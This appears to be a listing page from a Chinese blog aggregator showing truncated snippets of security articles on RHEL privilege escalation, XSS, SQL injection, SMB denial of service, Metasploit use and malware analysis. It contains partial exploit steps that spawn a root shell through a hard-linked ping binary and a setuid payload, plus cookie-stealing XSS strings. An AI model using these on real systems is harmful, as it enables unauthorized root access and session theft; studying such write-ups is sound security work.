说明:RHEL5—RHEL6下都可以提权1.ls-ld/tmp/2.ls-l/bin/ping3.mkdir/tmp/exploit;ln/bin/ping/tmp/exploit/target4.exec3</tmp/exploit/target;rm-rf/tmp/exploit/;ls-l/proc/$$/fd/35.vimpayload.cvoid__attribute__((constructor))init(){setuid(0);system("/bin/bash");..
分类:
其他好文 时间:
2017-03-30 20:02:49
阅读次数:
293
0x00.说明 在Kali linux上开启恶意SMB服务 (Windows上自身445端口已被占用) 在另一台Win10上查看共享文件,触发mrxsmb20.sys文件漏洞致使计算机蓝屏 0x01.POC示例 Win10.py odict.py 0x02.参考链接 Exploit-db:https ...
软件下载:https://www.exploit-db.com/apps/a1def037869c831496bda3d81b0d06f5-soritong10.exe 加载POC 程序崩溃点: SoriTong!MmutilityC8_4+0xc53:0040c55f 8802 mov byte ...
分类:
其他好文 时间:
2017-02-19 18:22:06
阅读次数:
199
PS:今天元旦,家里打来电话说,今年春节要回老家。心里倍感恐惧。可以清楚的感觉得到父母说话的气息没有底气。大概如同我一样是恐惧吧。加油吧!努力赚钱! 回归正题:updatexml注入 首先了解一下什么是updatexml函数。 前言:相比基于查询的SQL注入,使用insert、update和dele ...
分类:
其他好文 时间:
2017-01-01 23:58:44
阅读次数:
6554
前言 微软的Windows在企业或是个人应用领域占据着最大的市场份额,在渗透测试过程中你会经常遇到很多Windows的工作站和服务器。另一方面,大多数渗透测试人员主要使用基于Linux的发行版渗透测试系统,比如Kali Linux或者Pentoo和Backbox。因此你可能就需要有在Linux机器上 ...
'><script>alert(document.cookie)</script>='><script>alert(document.cookie)</script><script>alert(document.cookie)</script><script>alert(vulnerable)</s ...
分类:
其他好文 时间:
2016-11-29 17:02:39
阅读次数:
188
1、下载器和启动器 常见的两种恶意代码是下载器和启动器。下载器从互联网上下载其他的恶意代码,然后在本地系统中运行。下载器通常会与漏洞利用(exploit)打包一起。下载器常用windows API函数URLDownloadtoFileA和WinExec,来下载并运行新的恶意代码。 启动器(也称为加载 ...
分类:
其他好文 时间:
2016-11-18 22:13:52
阅读次数:
250
漏洞利用之Metasploit使用过程 先扫描端口,看开放的服务,如开放ftp,版本是vsftpd 2.3.4;使用search搜索vsftp查看是否在相应的漏洞利用exploit,输入search vsftp;use exploit/unix/ftp/vsftpd_234_backdoor,选择e ...
分类:
Web程序 时间:
2016-11-14 12:52:52
阅读次数:
233
17号paloalto发布了文章dealerschoice-sofacys-flash-player-exploit-platform,文中提到apt28正在编写adobe flash player的利用工具包,遂将样本下下来分析了一番。 和之前很多的flash漏洞利用不同,这次apt28将自身的漏 ...
分类:
其他好文 时间:
2016-10-21 00:36:52
阅读次数:
177
